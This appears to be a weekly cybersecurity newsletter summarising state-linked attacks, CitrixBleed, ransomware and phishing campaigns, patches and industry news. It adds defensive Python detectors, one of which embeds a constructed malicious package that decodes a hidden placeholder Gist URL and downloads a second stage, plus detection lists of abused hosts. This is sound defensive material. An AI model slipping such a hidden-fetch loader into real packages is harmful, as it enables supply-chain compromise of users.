At a glance.
- Predatory Sparrow and Iran's gas stations.
- Iran's Seedworm and its telco targets.
- Kyivstar's recovery from cyberattack.
- Ukrainian reprisals for Russia's Kyivstar attack.
- CitrixBleed exploit at Xfinity.
- Remote encryption of ransomware.
- Web-injection malware attacks on banks.
- Agent Tesla is spreading through an old vulnerability.
- Cyberattack on Insomniac Games.
- AI-generated email attacks.
- Malware increasingly uses public infrastructure.
- QR code scams.
Predatory Sparrow and Iran's gas stations.
On Monday of this week, according to the AP, about seventy percent of Iran's gasoline stations went out of operation due to what Iranian media at first described as a "software problem." Reuters subsequently reported that Iran's Oil Minister Javad Owji attributed the outages to a cyberattack. Iranian media attributed the attack to Predatory Sparrow, a group Iran attributes to Israel (and about which Israel had no comment). Like the CyberAv3ngers, Predatory Sparrow has a history in the region. The disruptions appear to have affected gas station point-of-sale systems, the Times of Israel reports. Predatory Sparrow claims to have accessed "the payment systems of the impacted gas stations, as well as each station’s central server and management system." For more on cyber operations connected with the Hamas-Israel war, see CyberWire Pro.
Iran's Seedworm and its telco targets.
Researchers at Symantec (part of Broadcom) warn that the Iranian cyberespionage group Seedworm (also known as “MuddyWater”) is targeting telecommunications organizations in Egypt, Sudan, and Tanzania: “Seedworm has long had an interest in telecommunications organizations, as do many groups engaged in cyberespionage activities. However, its strong focus on African organizations in this campaign is notable as, while it has been known to target organizations in Africa in the past, it does generally primarily focus on organizations in countries in the Middle East. That one of the victim organizations in this campaign is based in Egypt is also of note given Egypt’s proximity to Israel, a frequent target of Seedworm.”
Kyivstar's recovery from cyberattack.
The Kyiv Post reports that Kyivstar has fully restored its services, quoting the telco as saying, “The company’s specialists worked non-stop to swiftly restore subscribers’ ability to use all communication services throughout Ukraine and abroad after the largest hacker attack in the history of the global telecommunications market.” An analysis by the Atlantic Council considers the possibility that the attack on Kyivstar--a rare, large-scale success in the cyber phase of the hybrid war, and the most consequential Russian cyberattack since the takedown of Viasat ground stations in the hours after the invasion--may foreshadow an intensification of Russian efforts. Ukrainian defenses have proven formidable, but it would be unwise to assume that Russian offensive capabilities will not evolve into more effective forms in response.
Ukrainian reprisals for Russia's Kyivstar attack.
Ukrainian hacktivist auxiliaries claimed two reprisals for Russia's disruption of the Kyivstar telephone and Internet service.
The BLACKJACK group claimed, RBC-Ukraine reports, to have breached Russia's Rosvodokanal privately-owned water utility. RBC-Ukraine says the cyberattack was conducted with the support of Ukraine's SSU. The attack hit the utility's IT systems rather than its control systems, but BLACKJACK claims it disrupted operations nonetheless, specifically by accessing a large number of "documents," encrypting data on more than six thousand computers, and deleting more than fifty terabytes of data "including internal document circulation, corporate mail, cybersecurity services, backups, etc."
Another cyberattack, according to Ukrainska Pravda, sought to inflict damage on Bitrix24, an IT service provider whose customer relationship management (CRM) systems are used by many large Russian companies. The effects of the attack may extend beyond Russia proper to the Commonwealth of Independent States. The disruption of CRM services seems to be particularly serious, at least in the hacktivist auxiliary's reckoning. The IT Army of Ukraine claimed credit for the attack in a Telegram post.
The CyberWire's continuing coverage of Russia's war against Ukraine, with special attention to the cyber phases of that war, may be found here.
CitrixBleed exploit at Xfinity.
In a media release published Monday afternoon, Comcast's Xfinity unit issued a "Notice To Customers of Data Security Incident." In a notification filed with the Maine Attorney General, Comcast put the number of affected individuals at 35,879,455. The compromised data for affected customers include usernames and hashed passwords; the notice does not say which hashing scheme was used, and that is what determines how quickly the hashes can be cracked offline. Some customers may also have suffered exposure of names, contact information, the last four digits of Social Security Numbers, dates of birth, and "secret questions" together with their answers. The notifications advise recipients to reset their passwords and enable multifactor authentication.
Comcast hasn't received a ransom demand, nor has it seen any evidence of stolen data being exploited. “We are not aware of any customer data being leaked anywhere, nor of any attacks on our customers,” a company spokesman told TechCrunch. Comcast continues to investigate, and is working with appropriate law enforcement agencies. Neil Begley, Senior Vice President for Moody’s Investors Service, has offered an assessment of Comcast's breach. “Comcast’s announced cybersecurity breach is credit negative. Though cyber incidents have become more common, there remains risk as it could adversely impact customer behavior, cause churn to spike, and/or attract the scrutiny of the FCC and other regulators. Cyber incidents in the telecoms industry have been rising, raising questions about the industry’s cyber risk governance and defenses, as well as the overall exposure profile.”
CitrixBleed (CVE-2023-4966) is a now-patched vulnerability in Citrix NetScaler ADC and NetScaler Gateway appliances that leaks session tokens from appliance memory, letting an attacker hijack an authenticated session and bypass multifactor authentication; it is a flaw in an edge device, not a software supply chain compromise. It has been exploited in attacks against Boeing, the Industrial and Commercial Bank of China, Toyota, and other targets. One practitioner caveat: tokens stolen before the update remain valid afterward, so Citrix's guidance was to terminate active and persistent sessions (for example, `kill aaa session -all` and `kill icaconnection -all`) in addition to patching. For more on the Comcast incident, see CyberWire Pro.
Remote encryption of ransomware.
Researchers at Sophos warn that several high-profile ransomware groups, including Akira, ALPHV/BlackCat, LockBit, Royal, and Black Basta, are utilizing remote encryption in their attacks: “In remote encryption attacks, also known as remote ransomware, adversaries leverage a compromised and often underprotected endpoint to encrypt data on other devices connected to the same network.”
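Because the encrypting process runs on the compromised endpoint rather than on the file server, endpoint protection on the server never sees a malicious process; the server-side evidence is the client address and its write/rename pattern across the share. The following is an added detection example (not Sophos's code) that flags a client appending the same new suffix to many distinct files within a short window. The audit-log format, the addresses and the events are constructed for this illustration; a real deployment would map SMB audit events (Windows event 5145 on the file server, or a NAS audit log) onto the same fields.

```python
"""Flag file-share clients whose rename pattern looks like remote encryption.

Added example, not Sophos's code. The audit-log format is constructed for
this illustration: "<ISO timestamp> <client IP> <OP> <path>" where RENAME
lines carry "<old> -> <new>". Real inputs would be SMB audit events mapped
onto the same four fields.
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta

WINDOW = timedelta(seconds=60)   # sliding window per client
THRESHOLD = 25                   # distinct files given the same new suffix inside WINDOW


def parse_line(line):
    ts, client, op, *rest = line.split()
    return datetime.fromisoformat(ts), client, op, " ".join(rest)


def added_extension(old_path, new_path):
    """Return the suffix a RENAME appended to the original name (e.g. '.akira'),
    or None when the rename did something else (moved it, changed the stem)."""
    old_dir, _, old_name = old_path.rpartition("\\")
    new_dir, _, new_name = new_path.rpartition("\\")
    if old_dir != new_dir or not new_name.startswith(old_name + "."):
        return None
    return new_name[len(old_name):]


def detect_remote_encryption(lines, window=WINDOW, threshold=THRESHOLD):
    """Return {client: (suffix, distinct_files)} for clients that appended the
    same suffix to at least `threshold` distinct files within `window`."""
    recent = defaultdict(lambda: defaultdict(deque))   # client -> suffix -> (ts, path)
    flagged = {}
    for line in lines:
        ts, client, op, path = parse_line(line)
        if op != "RENAME" or " -> " not in path:
            continue
        old_path, new_path = path.split(" -> ", 1)
        suffix = added_extension(old_path, new_path)
        if suffix is None:
            continue
        window_events = recent[client][suffix]
        window_events.append((ts, old_path))
        while ts - window_events[0][0] > window:      # drop events older than the window
            window_events.popleft()
        distinct = {p for _, p in window_events}
        if len(distinct) >= threshold and client not in flagged:
            flagged[client] = (suffix, len(distinct))
    return flagged


def constructed_sample():
    """Constructed audit lines: one benign renamer and one bulk encrypter."""
    base = datetime(2023, 12, 20, 9, 0, 0)
    lines = []
    for i in range(3):   # benign: a user finalising drafts over ten minutes
        t = (base + timedelta(minutes=3 * i)).isoformat()
        lines.append(f"{t} 10.0.0.7 RENAME \\\\fs01\\hr\\draft{i}.docx -> \\\\fs01\\hr\\final{i}.docx")
    for i in range(40):  # suspicious: 40 files get the same new suffix in 20 seconds
        t = (base + timedelta(seconds=i // 2)).isoformat()
        lines.append(f"{t} 10.0.0.15 WRITE \\\\fs01\\finance\\doc{i}.xlsx")
        lines.append(f"{t} 10.0.0.15 RENAME \\\\fs01\\finance\\doc{i}.xlsx -> \\\\fs01\\finance\\doc{i}.xlsx.locked")
    return lines


if __name__ == "__main__":
    print(detect_remote_encryption(constructed_sample()))
```

This catches only the rename pattern. Ransomware that encrypts in place and keeps file names needs a content-based check (for instance, the entropy of data written back to the share), and the response action that matters is blocking or isolating the flagged client, since the malicious process is not on the server.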
Web-injection malware attacks on banks.
Researchers at IBM earlier this year discovered a malware campaign that’s using JavaScript web injections to target banking applications: “Since the beginning of 2023, we have seen over 50,000 infected user sessions where these injections were used by attackers, indicating the scale of threat activity, across more than 40 banks that were affected by this malware campaign across North America, South America, Europe, and Japan.”
Agent Tesla is spreading through an old vulnerability.
Zscaler warns that threat actors are exploiting CVE-2017-11882, a dated remote code execution flaw affecting the Equation Editor of Microsoft Office, to deliver the Agent Tesla keylogger. The attackers are distributing malicious documents via phishing emails: “To make these spam emails seem legitimate, threat actors use words like ‘invoices’ and ‘order’ in the emails. This strategy lends authenticity to fraudulent emails and encourages users to download attachments. Once a user downloads a malicious attachment and opens it, if their version of Microsoft Excel is vulnerable, the Excel file initiates communication with a malicious destination and proceeds to download additional files without requiring any further user interaction.”
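Microsoft patched CVE-2017-11882 in November 2017 and removed the Equation Editor component from Office altogether in January 2018, so the campaign only succeeds on installations that have gone years without updates. For mail-gateway or sandbox triage, the useful question is simply whether an attachment carries an Equation Editor object at all, since modern documents have no reason to. The following is an added example (not Zscaler's code) that answers that question for legacy binary and OOXML attachments by byte-searching the embedded OLE compound file for the "Equation Native" stream name (stored in UTF-16LE) and the "Equation.3" ProgID; the sample attachment it builds is constructed and is not a valid compound file.

```python
"""Triage Office attachments for an embedded Equation Editor object.

Added example, not Zscaler's code. CVE-2017-11882 is reached through an
Equation Editor OLE object. In a legacy binary document (.doc/.xls) that
object sits in the OLE compound file itself; in an OOXML package
(.docx/.xlsx) it sits in an embedded compound file such as
xl/embeddings/oleObject1.bin. Either way the compound file's directory
names an "Equation Native" stream in UTF-16LE, and its CompObj stream
carries the ANSI ProgID "Equation.3". Finding them is a triage signal
(an Equation Editor object is present), not proof of exploitation.
"""
import io
import zipfile

OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"
EQUATION_MARKERS = (
    "Equation Native".encode("utf-16-le"),   # stream name in the OLE directory
    b"Equation.3",                           # ProgID in the CompObj stream
)


def ole_has_equation_object(blob):
    return any(marker in blob for marker in EQUATION_MARKERS)


def find_equation_objects(data):
    """Return the locations inside `data` holding an Equation Editor object:
    ['<ole root>'] for a legacy OLE file, member names for an OOXML package,
    [] when nothing is found or the bytes are not an Office file."""
    if data.startswith(OLE_MAGIC):
        return ["<ole root>"] if ole_has_equation_object(data) else []
    if not data.startswith(b"PK\x03\x04"):
        return []
    hits = []
    with zipfile.ZipFile(io.BytesIO(data)) as pkg:
        for name in pkg.namelist():
            if "/embeddings/" not in name:
                continue
            member = pkg.read(name)
            if member.startswith(OLE_MAGIC) and ole_has_equation_object(member):
                hits.append(name)
    return hits


def constructed_sample_xlsx(with_equation):
    """Constructed stand-in for a phishing attachment. The embedded .bin is
    only an OLE header plus the marker bytes, not a valid compound file; it
    is enough to exercise the byte search."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as pkg:
        pkg.writestr("[Content_Types].xml", "<Types/>")
        pkg.writestr("xl/workbook.xml", "<workbook/>")
        if with_equation:
            fake_ole = OLE_MAGIC + b"\x00" * 504 + EQUATION_MARKERS[0] + b"\x00" * 32
            pkg.writestr("xl/embeddings/oleObject1.bin", fake_ole)
    return buf.getvalue()


if __name__ == "__main__":
    print(find_equation_objects(constructed_sample_xlsx(True)))
```

RTF carriers embed the same object as hex inside `\objdata`, so they need hex-decoding before the same search. On hosts that cannot be updated, the Equation Editor COM object can be disabled outright with the COM compatibility kill-bit for its class ID, {0002CE02-0000-0000-C000-000000000046}, as Microsoft's 2017 advisory described.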
Cyberattack on Insomniac Games.
Sony developer Insomniac Games sustained a massive data breach after it refused to pay a $2 million ransom to the Rhysida ransomware group, the Verge reports. The hackers published 1.67 terabytes of stolen data, including information and gameplay from the company’s upcoming Wolverine game, as well as data from several unannounced games. The leak also includes a great deal of personal information from thousands of current and former Insomniac employees. Jonathan Weissman, a principal lecturer at Rochester Institute of Technology’s Department of Cybersecurity, told Polygon, “We’re talking about non-disclosure agreements with major companies and studios, internal developer Slack communications, internal HR documents, scanned employee passports, and more.” For more on the cyberattack, including comments from industry experts, see CyberWire Pro.
AI-generated email attacks.
Abnormal Security describes several AI-generated phishing emails, noting that “[b]ecause these emails are often sent from a legitimate email service provider, are text-based, and rely on social engineering to compel the recipient to take action, it is challenging for traditional email security solutions to detect them as attacks.” In the attacks observed by Abnormal, scammers impersonated Netflix, an insurance company, and Australian cosmetics company LYCON.
Malware increasingly uses public infrastructure.
Researchers at ReversingLabs warn that two malware campaigns are using previously unobserved techniques to abuse GitHub. The first used GitHub Gists to host second-stage malware payloads: “In this incident, several PyPI packages presented themselves as libraries for handling network proxying, and contained a Base64 encoded string, allegedly related to telemetry data, but actually containing a URL pointing to a secret Gist.” A second malware campaign, probably launched by the same threat actor, used git commit messages to issue malware commands.
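The Gist technique hides in plain sight: a quoted Base64 literal that a reviewer reads as an opaque key or telemetry token but that decodes to a URL on public infrastructure. The following is an added example (not ReversingLabs' code) of a static check that decodes every long Base64 literal in a package's source and reports any that decode to a URL, marking hosts that are commonly abused for payload hosting. The package module and the Gist URL it contains are constructed placeholders, not a real package or Gist; the scanner covers only the Gist technique, not the commit-message command channel.

```python
"""Find Base64 literals in package source that decode to URLs.

Added example, not ReversingLabs' code. The package snippet and the Gist
URL below are constructed placeholders, not a real package or Gist.
"""
import base64
import binascii
import re
from urllib.parse import urlparse

B64_LITERAL = re.compile(r"""["']([A-Za-z0-9+/]{24,}={0,2})["']""")
URL = re.compile(r"""https?://[^\s"']+""")
PAYLOAD_HOSTS = {"gist.github.com", "gist.githubusercontent.com", "raw.githubusercontent.com"}


def decode_candidates(source):
    """Yield (literal, decoded_text) for quoted Base64 literals that decode
    to printable ASCII; real keys and binary blobs fall out here."""
    for match in B64_LITERAL.finditer(source):
        literal = match.group(1)
        try:
            decoded = base64.b64decode(literal, validate=True).decode("ascii")
        except (binascii.Error, ValueError, UnicodeDecodeError):
            continue
        if decoded.isprintable():
            yield literal, decoded


def find_hidden_urls(source):
    """Return [(url, host, host_is_known_payload_host)] for every URL hidden
    in a Base64 literal of `source`."""
    hits = []
    for _, decoded in decode_candidates(source):
        for url in URL.findall(decoded):
            host = urlparse(url).hostname or ""
            hits.append((url, host, host in PAYLOAD_HOSTS))
    return hits


# Constructed, clearly fake Gist URL and a package module in the shape the
# text describes: a "telemetry" constant that is really a Base64 URL.
PLACEHOLDER_GIST = "https://gist.github.com/EXAMPLE-USER/EXAMPLE-GIST-ID"
CONSTRUCTED_PACKAGE_SOURCE = '''
import base64
import urllib.request

PUBLIC_KEY_FRAGMENT = "AAAAB3NzaC1yc2EAAAADAQABAAAB"   # benign: decodes to binary
TELEMETRY_KEY = "%s"

def _proxy_bootstrap():
    # "telemetry" in the package's own words; actually fetches a second stage
    url = base64.b64decode(TELEMETRY_KEY).decode()
    return urllib.request.urlopen(url).read()
''' % base64.b64encode(PLACEHOLDER_GIST.encode()).decode()


if __name__ == "__main__":
    for url, host, known in find_hidden_urls(CONSTRUCTED_PACKAGE_SOURCE):
        print(f"{'PAYLOAD HOST' if known else 'url'}: {url} ({host})")
```

Any hit is worth a look, not just the marked hosts: a legitimate library has little reason to hide a URL from its own readers, and a decoded URL is a reviewable indicator where the Base64 literal was not.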
QR code scams.
Netcraft describes a recent phishing attack that used a phony multifactor authentication notification in an attempt to trick recipients into scanning a QR code. The notification purported to come from Microsoft, and the QR code led to a credential-harvesting site: “It’s worth noting that the criminal’s deception includes a reference to 2FA (two-factor authentication). Setting up 2FA is associated with improving online security, and a task that is commonly legitimately completed using QR codes. The QR code directs the user to a phishing site that tricks the victim into entering their Microsoft login and password.”
Patch news.
CISA issued nine Industrial Control System Advisories:
On Tuesday Apple patched Safari, iOS, iPadOS, and macOS Sonoma.
On Wednesday Google issued an emergency patch for a Chrome vulnerability undergoing active exploitation in the wild.
Mozilla released security upgrades for Firefox and Thunderbird this week.
ESET fixed a vulnerability in its SSL/TLS protocol scanning feature. The company lists the affected products as:
- ESET NOD32 Antivirus, ESET Internet Security, ESET Smart Security Premium, ESET Security Ultimate
- ESET Endpoint Antivirus for Windows and ESET Endpoint Security for Windows
- ESET Endpoint Antivirus for Linux 10.0 and above
- ESET Server Security for Windows Server (File Security for Microsoft Windows Server), ESET Mail Security for Microsoft Exchange Server, ESET Mail Security for IBM Domino, ESET Security for Microsoft SharePoint Server, ESET File Security for Microsoft Azure
- ESET Server Security for Linux 10.1 and above
Crime and punishment.
The rumored takedown of a leaksite maintained by the ALPHV/BlackCat ransomware operation was confirmed. The US Department of Justice this morning announced that it had indeed taken part in an international action against the ransomware-as-a-service gang. The FBI has developed a decryption tool that it's already provided to more than five-hundred victims of the gang, and the Department of Justice encourages other victims to come forward for assistance. For more on the takedown, see CyberWire Pro.
The Cyber Express reports that ALPHV and LockBit announced late this week their intention to form a ransomware cartel. It's a gesture toward honor among thieves, and toward some prospect of continued criminal survival. “The FBI doesn’t catch us alone; it joins forces with all the special services in the world; we have to do the same,” LockBit said, and its former criminal rivals in ALPHV responded, “LockBit’s right, we should all join a cartel or they’ll hunt us down one by one.” Whether numbers will bring strength or simply present a larger, more consolidated target to law enforcement is unclear.
The case of Qakbot shows how ephemeral law enforcement takedowns of infrastructure can be. The Register, citing multiple sources, reports that Qakbot has returned three months after it sustained Operation Duck Hunt, albeit with a lower volume of mischief than it showed during its good days. Operation Duck Hunt was an FBI-led action similar in scope to the ALPHV/BlackCat takedown.
Courts and torts.
The US Securities and Exchange Commission's (SEC) cyber incident disclosure rules went into effect on Monday, December 18. Companies can request a disclosure delay through the FBI, and the Bureau has released guidelines outlining the delay request procedure and determination process. There has been much debate over how to determine the materiality of a cyber incident, and the FBI’s guidelines state that, to avoid immediate denial, any delay request must be submitted concurrently with the materiality determination.
The Record notes that industry response to the reporting rules has been less than positive, and Republican lawmakers have proposed legislation to reverse them altogether. One argument is that disclosure could put organizations in harm’s way. But as one senior official at the Cybersecurity and Infrastructure Security Agency (CISA) explains, many experts feel the benefits outweigh the potential dangers. “We know that there is ubiquitous underreporting of cybersecurity incidents, and that diminishes our ability to help victims, our ability to provide effective guidance, our ability to understand adversary trends and drive broader risk reduction at scale,” the CISA official stated.
Policies, procurements, and agency equities.
The International Committee of the Red Cross (ICRC) has called upon states to take two measures that would bring cyber warfare into line with international norms of armed conflict. First, it asked that states observe proper discrimination in their cyber operations, and avoid hitting protected targets, and civilian targets generally. The prohibited targets specifically named are hospitals, power grids, and "data collected by humanitarian organizations and used exclusively for humanitarian ends." Second, it asked that governments control and restrain the participation of civilians--"individuals, hacker groups, and companies"--in cyber warfare. Such participation, the ICRC fears, will blur the vital distinction between combatants and noncombatants, and expose prohibited targets to greater risk of attack.
Acting in accordance with NCSC recommendations, Britain's National Grid has begun pulling components supplied by Chinese-controlled Nari Technology from its electrical power transmission network, the Financial Times reports. The removal of Nari products is motivated by concerns over the cybersecurity risk Chinese-manufactured components carry.
Twenty-one members of the US House of Representatives have submitted a letter to President Joe Biden claiming that the EU’s Digital Markets Act (DMA) unfairly targets US firms over Chinese and European companies. As Reuters explains, the DMA designates American Big Tech firms Alphabet, Amazon, Apple, Meta, and Microsoft as "gatekeeper" service providers. As of March 2024, these companies will be required to make their messaging apps interoperable with competitors' apps and to let users decide which apps come pre-installed on their devices. In the letter, the bipartisan group of lawmakers say that the new law will negatively impact the US economy and customer security, and they urge Biden to secure an EU pledge that the rules will be implemented fairly.
Fortunes of commerce.
Colorado-based apparel company VF Corporation (owner of Vans, North Face, and other major brands) reported a material cyberattack to the SEC on the first day the rules went into effect, the Record reports. VF stated, "The threat actor disrupted the Company’s business operations by encrypting some IT systems, and stole data from the Company, including personal data. The Company is working to bring the impacted portions of its IT systems back online and implement workarounds for certain offline operations with the aim of reducing disruption to its ability to serve its retail and brand e-commerce consumers and wholesale customers."
Mergers and acquisitions.
Identity and access management provider Okta is acquiring Israeli identity security posture management platform provider Spera for approximately $100 million, Calcalist reports.
Accenture has acquired UK-headquartered data consultancy Redkite.
London-based identity and access management firm Xalient has acquired digital identity advisory and managed services provider Grabowsky.
Reuters reports that Airbus is in talks to buy Atos's cybersecurity business BDS. Airbus and Atos declined to comment.
Investments and exits.
Boston-based cyber range provider SimSpace has secured $45 million in an equity raise led by L2 Point Management.
Anti-ransomware endpoint protection firm Halcyon has raised $40 million in a Series B round led by Bain Capital Ventures.
Origin AI, a Maryland-based startup that uses WiFi signals for motion sensing, has raised $15.9 million in a Series B extension led by Verisure, with participation from Okinawa Electric Power Company, Verizon Ventures, and INSPiRE.
Maryland-headquartered Turngate, a company that "offer[s] IT and cybersecurity professionals unprecedented insights into user activity," has secured $5 million in a seed funding round led by Paladin Capital Group.
And security innovation.
The US Cybersecurity and Infrastructure Security Agency (CISA) has issued an alert urging technology manufacturers to eliminate default passwords in their products. The agency recommends the following alternatives to default passwords:
- “Provide instance-unique setup passwords with the product;
- “Provide time-limited setup passwords that disable themselves when a setup process is complete and require activation of more secure authentication approaches, such as phishing-resistant MFA;
- “Require physical access for initial setup and the specification of instance-unique credentials.”
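The first two alternatives describe a credential lifecycle rather than a policy, and the following is an added example (not CISA's or any vendor's code) of what that lifecycle looks like in product code: a per-unit random setup password, stored only as a salted hash, that stops working when its time limit passes or when setup completes, whichever comes first. It assumes the device has a CSPRNG and a clock, and that the password is surfaced exactly once (on a label, a display, or the first-boot console); the serial numbers are constructed.

```python
"""Instance-unique, time-limited setup credential that disables itself.

Added example illustrating the CISA alternatives above; it is not CISA's
or any vendor's code. Assumptions: a CSPRNG, a clock, and a one-time
channel (label, display, first-boot console) for showing the password.
"""
import hashlib
import hmac
import secrets
import time

SETUP_TTL_SECONDS = 15 * 60


class SetupCredential:
    """Replaces a shared factory default such as admin/admin."""

    def __init__(self, device_serial, now=None, ttl=SETUP_TTL_SECONDS):
        issued = time.time() if now is None else now
        self.device_serial = device_serial
        self.expires_at = issued + ttl
        self.setup_complete = False
        self._salt = secrets.token_bytes(16)
        password = secrets.token_urlsafe(12)        # unique per unit, never hard-coded
        self._digest = self._hash(password)         # only the hash is kept
        self._plaintext_once = password             # surfaced exactly once, then dropped

    def _hash(self, password):
        return hashlib.pbkdf2_hmac("sha256", password.encode(), self._salt, 100_000)

    def reveal_once(self):
        """Return the plaintext the first time only; None afterwards."""
        password, self._plaintext_once = self._plaintext_once, None
        return password

    def verify(self, candidate, now=None):
        """True only while setup is incomplete, the TTL has not passed, and
        the candidate matches (constant-time compare)."""
        now = time.time() if now is None else now
        if self.setup_complete or now >= self.expires_at:
            return False
        return hmac.compare_digest(self._hash(candidate), self._digest)

    def complete_setup(self):
        """Called once the operator has enrolled a real credential (e.g. MFA);
        the setup password can never be used again."""
        self.setup_complete = True
        self._digest = None


if __name__ == "__main__":
    cred = SetupCredential("SN-000001")
    print("setup password (shown once):", cred.reveal_once())
```

The expiry is checked before the hash comparison so an expired or consumed credential fails without revealing whether the guess was right, and `complete_setup()` discards the digest so that no later code path can reinstate it.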
CISA has also published a detailed Cybersecurity Advisory outlining the results of a risk and vulnerability assessment the agency conducted for a healthcare and public health organization in January 2023. CISA says, “As part of the RVA, the CISA assessment team conducted web application, phishing, penetration, database, and wireless assessments. The assessed organization was a large organization deploying on-premises software.”
And CISA has updated its approach to information sharing through its Automated Indicator Sharing (AIS) program. In 2024 the agency will focus on "simplification," "partner-centered design," and “learning from experience."